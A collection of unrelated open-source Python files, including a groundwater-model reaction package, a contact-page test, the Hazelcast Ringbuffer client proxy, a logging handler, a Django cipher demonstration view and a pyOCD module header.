reaction is radioactive decay, rc2 should be set equal to rc1, while
for biodegradation, rc2 may be different from rc1. Note that rc2 is
read but not used, if no sorption is included in the simulation. If
rc2 is not specified and ireact > 0 then rc2 is set to 0.
(default is None).
extension : string
Filename extension (default is 'rct')
unitnumber : int
File unit number. If file unit number is None then an unused unit
number if used. (default is None).
**kwargs
--------
srconcn : float or array of floats (nlay, nrow, ncol)
srconcn is the user-specified initial concentration for the sorbed
phase of species n. If srconcn is not passed as a **kwarg and
isothm = 4, 5, or 6 then srconc for species n is set to 0.
See description of srconc for a more complete description of srconcn.
sp1n : float or array of floats (nlay, nrow, ncol)
sp1n is the first sorption parameter for species n. If sp1n is not
passed as a **kwarg and isothm > 0 then sp1 for species n is set to 0.
See description of sp1 for a more complete description of sp1n.
sp2n : float or array of floats (nlay, nrow, ncol)
sp2n is the second sorption or dual-domain model parameter for species
n. If sp2n is not passed as a **kwarg and isothm > 0 then sp2 for
species n is set to 0. See description of sp2 for a more complete
description of sp2n.
rc1n : float or array of floats (nlay, nrow, ncol)
rc1n is the first-order reaction rate for the dissolved (liquid) phase
for species n. If rc1n is not passed as a **kwarg and ireact > 0 then
rc1 for species n is set to 0. See description of rc1 for a more
complete description of rc1n.
rc2n : float or array of floats (nlay, nrow, ncol)
rc2n is the first-order reaction rate for the sorbed phase for species
n. If rc2n is not passed as a **kwarg and ireact > 0 then rc2 for
species n is set to 0. See description of rc2 for a more complete
description of rc2n.
extension : string
Filename extension (default is 'rct')
unitnumber : int
File unit number (default is None).
filenames : str or list of str
Filenames to use for the package. If filenames=None the package name
will be created using the model name and package extension. If a
single string is passed the package will be set to the string.
Default is None.
Attributes
----------
Methods
-------
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
>>> mt = flopy.mt3dms.Mt3dms()
>>> rct = flopy.mt3dms.Mt3dRct(mt)
"""
def __init__(self, model, isothm=0, ireact=0, igetsc=1, rhob=None,
prsity2=None, srconc=None, sp1=None, sp2=None, rc1=None,
rc2=None, extension='rct', unitnumber=None,
filenames=None, **kwargs):
"""
Package constructor.
"""
if unitnumber is None:
unitnumber = Mt3dRct.defaultunit()
elif unitnumber == 0:
unitnumber = Mt3dRct.reservedunit()
# set filenames
if filenames is None:
filenames = [None]
elif isinstance(filenames, str):
filenames = [filenames]
# Fill namefile items
name = [Mt3dRct.ftype()]
units = [unitnumber]
extra = ['']
# set package name
fname = [filenames[0]]
# Call ancestor's init to set self.parent, extension, name and unit number
Package.__init__(self, model, extension=extension, name=name,
unit_number=units, extra=extra, filenames=fname)
nrow = model.nrow
ncol = model.ncol
nlay = model.nlay
ncomp = model.ncomp
# Item E1: ISOTHM, IREACT, IRCTOP, IGETSC
self.isothm = isothm
self.ireact = ireact
self.irctop = 2 # All RCT vars are specified as 3D arrays
self.igetsc = igetsc
# Item E2A: RHOB
if rhob is None:
rhob = 1.8e3
self.rhob = Util3d(model, (nlay, nrow, ncol), np.float32, rhob,
name='rhob', locat=self.unit_number[0],
array_free_format=False)
# Item E2B: PRSITY
if prsity2 is None:
prsity2 = 0.1
self.prsity2 = Util3d(model, (nlay, nrow, ncol), np.float32, prsity2,
name='prsity2', locat=self.unit_number[0],
array_free_format=False)
# Item E2C: SRCONC
if srconc is None:
srconc = 0.0
self.srconc = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, srconc,
name='srconc1', locat=self.unit_number[0],
array_free_format=False)
self.srconc.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "srconc" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting srconc for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.srconc.append(u3d)
# Item E3: SP1
if sp1 is None:
sp1 = 0.0
self.sp1 = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, sp1, name='sp11',
locat=self.unit_number[0], array_free_format=False)
self.sp1.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "sp1" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting sp1 for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.sp1.append(u3d)
# Item E4: SP2
if sp2 is None:
sp2 = 0.0
self.sp2 = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, sp2, name='sp21',
locat=self.unit_number[0], array_free_format=False)
self.sp2.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "sp2" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting sp2 for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.sp2.append(u3d)
# Item E5: RC1
if rc1 is None:
rc1 = 0.0
self.rc1 = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, rc1, name='rc11',
locat=self.unit_number[0], array_free_format=False)
self.rc1.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "rc1" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting rc1 for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.rc1.append(u3d)
# Item E4: RC2
if rc2 is None:
rc2 = 0.0
self.rc2 = []
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, rc2, name='rc21',
locat=self.unit_number[0], array_free_format=False)
self.rc2.append(u3d)
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "rc2" + str(icomp)
val = 0.0
if name in kwargs:
val = kwargs.pop(name)
else:
print("RCT: setting rc2 for component " +
str(icomp) + " to zero, kwarg name " +
name)
u3d = Util3d(model, (nlay, nrow, ncol), np.float32, val,
name=name, locat=self.unit_number[0],
array_free_format=False)
self.rc2.append(u3d)
# Check to make sure that all kwargs have been consumed
if len(list(kwargs.keys())) > 0:
raise Exception("RCT error: unrecognized kwargs: " +
' '.join(list(kwargs.keys())))
self.parent.add_package(self)
return
def __repr__(self):
return 'Chemical reaction package class'
def write_file(self):
"""
Write the package file
Returns
-------
None
"""
# Open file for writing
f_rct = open(self.fn_path, 'w')
f_rct.write('%10i%10i%10i%10i\n' % (self.isothm, self.ireact,
self.irctop, self.igetsc))
if (self.isothm in [1, 2, 3, 4, 6]):
f_rct.write(self.rhob.get_file_entry())
if (self.isothm in [5, 6]):
f_rct.write(self.prsity2.get_file_entry())
if (self.igetsc > 0):
for icomp in range(len(self.srconc)):
f_rct.write(self.srconc[icomp].get_file_entry())
if (self.isothm > 0):
for icomp in range(len(self.sp1)):
f_rct.write(self.sp1[icomp].get_file_entry())
if (self.isothm > 0):
for icomp in range(len(self.sp2)):
f_rct.write(self.sp2[icomp].get_file_entry())
if (self.ireact > 0):
for icomp in range(len(self.rc1)):
f_rct.write(self.rc1[icomp].get_file_entry())
if (self.ireact > 0):
for icomp in range(len(self.rc2)):
f_rct.write(self.rc2[icomp].get_file_entry())
f_rct.close()
return
@staticmethod
def load(f, model, nlay=None, nrow=None, ncol=None, ncomp=None,
ext_unit_dict=None):
"""
Load an existing package.
Parameters
----------
f : filename or file handle
File to load.
model : model object
The model object (of type :class:`flopy.mt3d.mt.Mt3dms`) to
which this package will be added.
nlay : int
Number of model layers in the reaction package. If nlay is not
specified, the number of layers in the passed model object is
used. (default is None).
nrow : int
Number of model rows in the reaction package. If nrow is not
specified, the number of rows in the passed model object is
used. (default is None).
ncol : int
Number of model columns in the reaction package. If nlay is not
specified, the number of columns in the passed model object is
used. (default is None).
ext_unit_dict : dictionary, optional
If the arrays in the file are specified using EXTERNAL,
or older style array control records, then `f` should be a file
handle. In this case ext_unit_dict is required, which can be
constructed using the function
:class:`flopy.utils.mfreadnam.parsenamefile`.
Returns
-------
rct : Mt3dRct object
Mt3dRct object.
Examples
--------
>>> import flopy
>>> mt = flopy.mt3d.Mt3dms()
>>> rct = flopy.mt3d.Mt3dRct.load('test.rct', mt)
"""
if model.verbose:
sys.stdout.write('loading rct package file...\n')
# Open file, if necessary
if not hasattr(f, 'read'):
filename = f
f = open(filename, 'r')
# Set dimensions if necessary
if nlay is None:
nlay = model.nlay
if nrow is None:
nrow = model.nrow
if ncol is None:
ncol = model.ncol
if ncomp is None:
ncomp = model.ncomp
# Setup kwargs to store multispecies information
kwargs = {}
# Item E1
line = f.readline()
if model.verbose:
print(' loading ISOTHM, IREACT, IRCTOP, IGETSC...')
isothm = int(line[0:10])
ireact = int(line[11:20])
try:
irctop = int(line[21:30])
except:
irctop = 0
try:
igetsc = int(line[31:40])
except:
igetsc = 0
if model.verbose:
print(' ISOTHM {}'.format(isothm))
print(' IREACT {}'.format(ireact))
print(' IRCTOP {}'.format(irctop))
print(' IGETSC {}'.format(igetsc))
# Item E2A: RHOB
rhob = None
if model.verbose:
print(' loading RHOB...')
if isothm in [1, 2, 3, 4, 6]:
rhob = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'rhob', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' RHOB {}'.format(rhob))
# Item E2A: PRSITY2
prsity2 = None
if model.verbose:
print(' loading PRSITY2...')
if isothm in [5, 6]:
prsity2 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'prsity2', ext_unit_dict,
array_format="mt3d")
if model.verbose:
print(' PRSITY2 {}'.format(prsity2))
# Item E2C: SRCONC
srconc = None
if model.verbose:
print(' loading SRCONC...')
if igetsc > 0:
srconc = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'srconc1', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' SRCONC {}'.format(srconc))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "srconc" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' SRCONC{} {}'.format(icomp, u3d))
# Item E3: SP1
sp1 = None
if model.verbose:
print(' loading SP1...')
if isothm > 0:
sp1 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'sp11', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' SP1 {}'.format(sp1))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "sp1" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' SP1{} {}'.format(icomp, u3d))
# Item E4: SP2
sp2 = None
if model.verbose:
print(' loading SP2...')
if isothm > 0:
sp2 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'sp21', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' SP2 {}'.format(sp2))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "sp2" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' SP2{} {}'.format(icomp, u3d))
# Item E5: RC1
rc1 = None
if model.verbose:
print(' loading RC1...')
if ireact > 0:
rc1 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'rc11', ext_unit_dict,
array_format="mt3d")
if model.verbose:
print(' RC1 {}'.format(rc1))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "rc1" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' RC1{} {}'.format(icomp, u3d))
# Item E6: RC2
rc2 = None
if model.verbose:
print(' loading RC2...')
if ireact > 0:
rc2 = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
'rc21', ext_unit_dict, array_format="mt3d")
if model.verbose:
print(' RC2 {}'.format(rc2))
if ncomp > 1:
for icomp in range(2, ncomp + 1):
name = "rc2" + str(icomp)
if model.verbose:
print(' loading {}...'.format(name))
u3d = Util3d.load(f, model, (nlay, nrow, ncol), np.float32,
name, ext_unit_dict, array_format="mt3d")
kwargs[name] = u3d
if model.verbose:
print(' RC2{} {}'.format(icomp, u3d))
# Close the file
f.close()
# set package unit number
unitnumber = None
filenames = [None]
if ext_unit_dict is not None:
unitnumber, filenames[0] = \
model.get_ext_dict_attr(ext_unit_dict,
filetype=Mt3dRct.ftype())
# Construct and return rct package
rct = Mt3dRct(model, isothm=isothm, ireact=ireact, igetsc=igetsc,
rhob=rhob, prsity2=prsity2, srconc=srconc, sp1=sp1,
sp2=sp2, rc1=rc1, rc2=rc2, unitnumber=unitnumber,
filenames=filenames)
return rct
@staticmethod
def ftype():
return 'RCT'
@staticmethod
def defaultunit():
return 36
@staticmethod
def reservedunit():
return 8
| bdestombe/flopy-1 | flopy/mt3d/mtrct.py | Python | bsd-3-clause | 26,430 |
import re
from models.contact import Contact
def test_all_contacts_on_homepage(app, db):
if app.contact.count() == 0:
app.contact.add(Contact(first_name="Mister", last_name="Muster", mobile_phone="123", email_1="[email protected]"))
contacts_from_homepage = sorted(app.contact.get_contact_list(), key = Contact.contact_id_or_max)
contacts_from_db = sorted(db.get_contact_list(), key = Contact.contact_id_or_max)
for i in range(len(contacts_from_homepage)):
hp_contact=contacts_from_homepage[i]
db_contact=contacts_from_db[i]
assert hp_contact.first_name == db_contact.first_name
assert hp_contact.last_name == db_contact.last_name
assert clear_address(hp_contact.address) == clear_address(db_contact.address)
assert clear_phone(hp_contact.all_phones_homepage) == clear_phone(merge_phones_homepage(db_contact))
assert hp_contact.all_emails_homepage == merge_emails_homepage(db_contact)
print("Successfully verified %s contacts vs Database" % str(len(contacts_from_homepage)))
"""def test_contact_on_homepage(app):
if app.contact.count() == 0:
app.contact.add(Contact(first_name="Mister", last_name="Muster", mobile_phone="123", email_1="[email protected]"))
index = randrange(len(app.contact.get_contact_list()))
contact_from_homepage = app.contact.get_contact_list()[index]
contact_from_editpage = app.contact.get_contact_data_editpage(index)
assert contact_from_homepage.first_name == contact_from_editpage.first_name
assert contact_from_homepage.last_name == contact_from_editpage.last_name
assert contact_from_homepage.address == contact_from_editpage.address
assert contact_from_homepage.all_phones_homepage == merge_phones_homepage(contact_from_editpage)
assert contact_from_homepage.all_emails_homepage == merge_emails_homepage(contact_from_editpage)"""
"""def test_phones_on_viewpage(app):
contact_from_viewpage = app.contact.get_contact_data_viewpage(0)
contact_from_editpage = app.contact.get_contact_data_editpage(0)
assert contact_from_viewpage.home_phone == contact_from_editpage.home_phone
assert contact_from_viewpage.work_phone == contact_from_editpage.work_phone
assert contact_from_viewpage.mobile_phone == contact_from_editpage.mobile_phone
assert contact_from_viewpage.fax == contact_from_editpage.fax"""
def clear(s):
#return "".join(symbol for symbol in s if symbol not in "[]()- 0")
return re.sub("[- ()]", "", s)
def clear_phone(number):
return re.sub("0", "", number)
def clear_address(address):
return re.sub("[\n\r\s+]", "", address)
def merge_phones_homepage(contact):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
[contact.home_phone, contact.mobile_phone, contact.work_phone]))))
def merge_emails_homepage(contact):
return "\n".join(filter(lambda x: x != "", filter(lambda x: x is not None,
[contact.email_1, contact.email_2, contact.email_3])))
| rgurevych/python_for_testers | tests/test_contacts_data_compliance.py | Python | apache-2.0 | 3,163 |
from hazelcast.future import ImmediateFuture, Future
from hazelcast.protocol.codec import (
ringbuffer_add_all_codec,
ringbuffer_add_codec,
ringbuffer_capacity_codec,
ringbuffer_head_sequence_codec,
ringbuffer_read_many_codec,
ringbuffer_read_one_codec,
ringbuffer_remaining_capacity_codec,
ringbuffer_size_codec,
ringbuffer_tail_sequence_codec,
)
from hazelcast.proxy.base import PartitionSpecificProxy
from hazelcast.util import (
check_not_negative,
check_not_none,
check_not_empty,
check_true,
ImmutableLazyDataList,
)
OVERFLOW_POLICY_OVERWRITE = 0
"""
Configuration property for DEFAULT overflow policy. When an item is tried to be added on full Ringbuffer, oldest item in
the Ringbuffer is overwritten and item is added.
"""
OVERFLOW_POLICY_FAIL = 1
"""
Configuration property for overflow policy. When an item is tried to be added on full Ringbuffer, the call fails and
item is not added.
The reason that FAIL exist is to give the opportunity to obey the ttl. If blocking behavior is required, this can be
implemented using retrying in combination with an exponential backoff.
>>> sleepMS = 100;
>>> while true:
>>> result = ringbuffer.add(item, -1)
>>> if result != -1:
>>> break
>>> sleep(sleepMS / 1000)
>>> sleepMS *= 2
"""
MAX_BATCH_SIZE = 1000
"""
The maximum number of items to be added to RingBuffer or read from RingBuffer at a time.
"""
class Ringbuffer(PartitionSpecificProxy):
"""A Ringbuffer is an append-only data-structure where the content is
stored in a ring like structure.
A ringbuffer has a capacity so it won't grow beyond that capacity and
endanger the stability of the system. If that capacity is exceeded, than
the oldest item in the ringbuffer is overwritten. The ringbuffer has two
always incrementing sequences:
- :func:`tail_sequence`: This is the side where the youngest item is found.
So the tail is the side of the ringbuffer where items are added to.
- :func:`head_sequence`: This is the side where the oldest items are found.
So the head is the side where items gets discarded.
The items in the ringbuffer can be found by a sequence that is in between
(inclusive) the head and tail sequence.
If data is read from a ringbuffer with a sequence that is smaller than the
head sequence, it means that the data is not available anymore and a
:class:`hazelcast.errors.StaleSequenceError` is thrown.
A Ringbuffer currently is a replicated, but not partitioned data structure.
So all data is stored in a single partition, similarly to the
:class:`hazelcast.proxy.queue.Queue` implementation.
A Ringbuffer can be used in a way similar to the Queue, but one of the key
differences is that a :func:`hazelcast.proxy.queue.Queue.take` is destructive,
meaning that only 1 thread is able to take an item. A :func:`read_one` is not
destructive, so you can have multiple threads reading the same item multiple
times.
"""
def __init__(self, service_name, name, context):
super(Ringbuffer, self).__init__(service_name, name, context)
self._capacity = None
def capacity(self):
"""Returns the capacity of this Ringbuffer.
Returns:
hazelcast.future.Future[int]: The capacity of Ringbuffer.
"""
if not self._capacity:
def handler(message):
self._capacity = ringbuffer_capacity_codec.decode_response(message)
return self._capacity
request = ringbuffer_capacity_codec.encode_request(self.name)
return self._invoke(request, handler)
return ImmediateFuture(self._capacity)
def size(self):
"""Returns number of items in the Ringbuffer.
Returns:
hazelcast.future.Future[int]: The size of Ringbuffer.
"""
request = ringbuffer_size_codec.encode_request(self.name)
return self._invoke(request, ringbuffer_size_codec.decode_response)
def tail_sequence(self):
"""Returns the sequence of the tail.
The tail is the side of the Ringbuffer where the items are added to.
The initial value of the tail is ``-1``.
Returns:
hazelcast.future.Future[int]: The sequence of the tail.
"""
request = ringbuffer_tail_sequence_codec.encode_request(self.name)
return self._invoke(request, ringbuffer_tail_sequence_codec.decode_response)
def head_sequence(self):
"""Returns the sequence of the head.
The head is the side of the Ringbuffer where the oldest items in the
Ringbuffer are found. If the Ringbuffer is empty, the head will be one
more than the tail. The initial value of the head is ``0`` (``1`` more
than tail).
Returns:
hazelcast.future.Future[int]: The sequence of the head.
"""
request = ringbuffer_head_sequence_codec.encode_request(self.name)
return self._invoke(request, ringbuffer_head_sequence_codec.decode_response)
def remaining_capacity(self):
"""Returns the remaining capacity of the Ringbuffer.
Returns:
hazelcast.future.Future[int]: The remaining capacity of Ringbuffer.
"""
request = ringbuffer_remaining_capacity_codec.encode_request(self.name)
return self._invoke(request, ringbuffer_remaining_capacity_codec.decode_response)
def add(self, item, overflow_policy=OVERFLOW_POLICY_OVERWRITE):
"""Adds the specified item to the tail of the Ringbuffer.
If there is no space in the Ringbuffer, the action is determined by
``overflow_policy`` as :const:`OVERFLOW_POLICY_OVERWRITE` or
:const:`OVERFLOW_POLICY_FAIL`.
Args:
item: The specified item to be added.
overflow_policy (int): the OverflowPolicy to be used when there is
no space.
Returns:
hazelcast.future.Future[int]: The sequenceId of the added item, or
``-1`` if the add failed.
"""
item_data = self._to_data(item)
request = ringbuffer_add_codec.encode_request(self.name, overflow_policy, item_data)
return self._invoke(request, ringbuffer_add_codec.decode_response)
def add_all(self, items, overflow_policy=OVERFLOW_POLICY_OVERWRITE):
"""Adds all of the item in the specified collection to the tail of the
Ringbuffer.
This is likely to outperform multiple calls to :func:`add` due
to better io utilization and a reduced number of executed operations.
The items are added in the order of the Iterator of the collection.
If there is no space in the Ringbuffer, the action is determined by
``overflow_policy`` as :const:`OVERFLOW_POLICY_OVERWRITE` or
:const:`OVERFLOW_POLICY_FAIL`.
Args:
items (list): The specified collection which contains the items
to be added.
overflow_policy (int): The OverflowPolicy to be used when there
is no space.
Returns:
hazelcast.future.Future[int]: The sequenceId of the last written item,
or ``-1`` of the last write is failed.
"""
check_not_empty(items, "items can't be empty")
if len(items) > MAX_BATCH_SIZE:
raise AssertionError("Batch size can't be greater than %d" % MAX_BATCH_SIZE)
item_data_list = []
for item in items:
check_not_none(item, "item can't be None")
item_data_list.append(self._to_data(item))
request = ringbuffer_add_all_codec.encode_request(
self.name, item_data_list, overflow_policy
)
return self._invoke(request, ringbuffer_add_all_codec.decode_response)
def read_one(self, sequence):
"""Reads one item from the Ringbuffer.
If the sequence is one beyond the current tail, this call blocks until
an item is added. Currently it isn't possible to control how long
this call is going to block.
Args:
sequence (int): The sequence of the item to read.
Returns:
The read item.
"""
check_not_negative(sequence, "sequence can't be smaller than 0")
def handler(message):
return self._to_object(ringbuffer_read_one_codec.decode_response(message))
request = ringbuffer_read_one_codec.encode_request(self.name, sequence)
return self._invoke(request, handler)
def read_many(self, start_sequence, min_count, max_count, filter=None):
"""Reads a batch of items from the Ringbuffer.
If the number of available items after the first read item is smaller
than the ``max_count``, these items are returned. So it could be the
number of items read is smaller than the ``max_count``. If there are
less items available than ``min_count``, then this call blocks.
Warnings:
These blocking calls consume server memory and if there are many
calls, it can be possible to see leaking memory or
``OutOfMemoryError`` s on the server.
Reading a batch of items is likely to perform better because less
overhead is involved.
A filter can be provided to only select items that need to be read. If
the filter is ``None``, all items are read. If the filter is not
``None``, only items where the filter function returns true are
returned. Using filters is a good way to prevent getting items that
are of no value to the receiver. This reduces the amount of IO and the
number of operations being executed, and can result in a significant
performance improvement. Note that, filtering logic must be defined
on the server-side.
If the ``start_sequence`` is smaller than the smallest sequence still
available in the Ringbuffer (:func:`head_sequence`), then the smallest
available sequence will be used as the start sequence and the
minimum/maximum number of items will be attempted to be read from there
on.
If the ``start_sequence`` is bigger than the last available sequence
in the Ringbuffer (:func:`tail_sequence`), then the last available
sequence plus one will be used as the start sequence and the call will
block until further items become available and it can read at least the
minimum number of items.
Args:
start_sequence (int): The start sequence of the first item to read.
min_count (int): The minimum number of items to read.
max_count (int): The maximum number of items to read.
filter: Filter to select returned elements.
Returns:
hazelcast.future.Future[ReadResult]: The list of read items.
"""
check_not_negative(start_sequence, "sequence can't be smaller than 0")
check_not_negative(min_count, "min count can't be smaller than 0")
check_true(max_count >= min_count, "max count should be greater or equal to min count")
check_true(
max_count < MAX_BATCH_SIZE, "max count can't be greater than %d" % MAX_BATCH_SIZE
)
request = ringbuffer_read_many_codec.encode_request(
self.name, start_sequence, min_count, max_count, self._to_data(filter)
)
def handler(message):
response = ringbuffer_read_many_codec.decode_response(message)
read_count = response["read_count"]
next_seq = response["next_seq"]
items = response["items"]
item_seqs = response["item_seqs"]
return ReadResult(read_count, next_seq, items, item_seqs, self._to_object)
def continuation(future):
# Since the first call to capacity
# is cached on the client-side, doing
# a capacity check each time should not
# be a problem
capacity = future.result()
check_true(
max_count <= capacity,
"max count: %d should be smaller or equal to capacity: %d" % (max_count, capacity),
)
return self._invoke(request, handler)
return self.capacity().continue_with(continuation)
class ReadResult(ImmutableLazyDataList):
"""Defines the result of a :func:`Ringbuffer.read_many` operation."""
SEQUENCE_UNAVAILABLE = -1
"""Value returned from methods returning a sequence number when the
information is not available (e.g. because of rolling upgrade and some
members not returning the sequence).
"""
def __init__(self, read_count, next_seq, items, item_seqs, to_object):
super(ReadResult, self).__init__(items, to_object)
self._read_count = read_count
self._next_seq = next_seq
self._item_seqs = item_seqs
@property
def read_count(self):
"""int: The number of items that have been read before filtering.
If no filter is set, then the :attr:`read_count` will be equal to
:attr:`size`.
But if a filter is applied, it could be that items are read, but are
filtered out. So, if you are trying to make another read based on
this, then you should increment the sequence by :attr:`read_count` and
not by :attr:`size`.
Otherwise you will be re-reading the same filtered messages.
"""
return self._read_count
@property
def size(self):
"""int: The result set size.
See Also:
:attr:`read_count`
"""
return len(self._list_data)
@property
def next_sequence_to_read_from(self):
"""int: The sequence of the item following the last read item.
This sequence can then be used to read items following the ones
returned by this result set.
Usually this sequence is equal to the sequence used to retrieve this
result set incremented by the :attr:`read_count`. In cases when the
reader tolerates lost items, this is not the case.
For instance, if the reader requests an item with a stale sequence (one
which has already been overwritten), the read will jump to the oldest
sequence and read from there.
Similarly, if the reader requests an item in the future (e.g. because
the partition was lost and the reader was unaware of this), the read
method will jump back to the newest available sequence.
Because of these jumps and only in the case when the reader is loss
tolerant, the next sequence must be retrieved using this method.
A return value of :const:`SEQUENCE_UNAVAILABLE` means that the
information is not available.
"""
return self._next_seq
def get_sequence(self, index):
"""Return the sequence number for the item at the given index.
Args:
index (int): The index.
Returns:
int: The sequence number for the ringbuffer item.
"""
return self._item_seqs[index]
| hazelcast/hazelcast-python-client | hazelcast/proxy/ringbuffer.py | Python | apache-2.0 | 15,194 |
# _logger.py
import logging
import _database as _db
__version__ = '0.0.1'
class SQLAlchemyHandler(logging.Handler):
# A very basic logger that commits a LogRecord to the SQL Db
def emit(self, record):
session = _db.ConnectToDatabase()
log = _db.Log(
logger=record.__dict__['filename'],
level=record.__dict__['levelname'],
msg=record.__dict__['msg'],)
session.add(log)
session.commit()
session.close()
import logging
log = logging.getLogger('root')
log.debug('Logging Module Initialized.')
| Hakugin/TimeClock | _logger.py | Python | gpl-2.0 | 581 |
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libstego. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2009 2010 by Marko Krause <[email protected]>
from django.shortcuts import get_object_or_404, render_to_response
from .models import (
AESEncryptForm,
AESDecryptForm,
SimpleEncryptForm,
SimpleDecryptForm,
RSAEncryptForm,
RSADecryptForm,
SimplestForm,
CaesarEncryptForm,
CaesarDecryptForm,
AffineEncryptForm,
AffineDecryptForm,
)
from .cryptointerface import (
desEncrypt,
desDecrypt,
aesEncrypt,
aesDecrypt,
rsaEncrypt,
rsaDecrypt,
xorEncrypt,
xorDecrypt,
atbaschEncrypt,
caesarEncrypt,
caesarDecrypt,
affineEncrypt,
affineDecrypt,
keygen,
)
from base_app.models import Algo, ManPage
def algo(request, algo_name):
output = ""
cypher = ""
algo_object = get_object_or_404(Algo, shortTitle=algo_name)
manual = get_object_or_404(ManPage, algo=algo_object)
cypherFormDict = {
"aes": AESEncryptForm,
"des": AESEncryptForm,
"xor": SimpleEncryptForm,
"rsa": RSAEncryptForm,
"atbasch": SimplestForm,
"caesar": CaesarEncryptForm,
"affine": AffineEncryptForm,
}
decypherFormDict = {
"aes": AESDecryptForm,
"des": AESDecryptForm,
"xor": SimpleDecryptForm,
"rsa": RSADecryptForm,
"atbasch": None,
"caesar": CaesarDecryptForm,
"affine": AffineDecryptForm,
}
if request.method == "POST":
if "keygen" in request.POST:
return keygen()
# encrypt
elif "submit1" in request.POST:
algoDict = {
"aes": aesEncrypt,
"des": desEncrypt,
"xor": xorEncrypt,
"rsa": rsaEncrypt,
"atbasch": atbaschEncrypt,
"caesar": caesarEncrypt,
"affine": affineEncrypt,
}
cypherForm = cypherFormDict[algo_name](request.POST)
if decypherFormDict[algo_name]:
decypherForm = decypherFormDict[algo_name]()
else:
decypherForm = None
if cypherForm.is_valid():
output, cypher = algoDict[algo_name](request)
# decrypt
elif "submit2" in request.POST:
algoDict = {
"aes": aesDecrypt,
"des": desDecrypt,
"xor": xorDecrypt,
"rsa": rsaDecrypt,
"caesar": caesarDecrypt,
"affine": affineDecrypt,
}
cypherForm = cypherFormDict[algo_name]()
decypherForm = decypherFormDict[algo_name](request.POST)
if decypherForm.is_valid():
cypher = algoDict[algo_name](request)
else:
cypherForm = cypherFormDict[algo_name]()
if decypherFormDict[algo_name]:
decypherForm = decypherFormDict[algo_name]()
else:
decypherForm = None
return render_to_response(
"crypto_algo.html",
{
"algo": algo_object,
"output": output,
"cypher": cypher,
"decypherForm": decypherForm,
"cypherForm": cypherForm,
"algo_type": "Kryptographie",
"manual": manual,
},
)
| zeratul2099/crypt_app | crypto/views.py | Python | gpl-3.0 | 3,975 |
# pyOCD debugger
# Copyright (c) 2015-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import logging
import os
import sys
import traceback
from xml.etree import ElementTree
import six
import subprocess
import tempfile
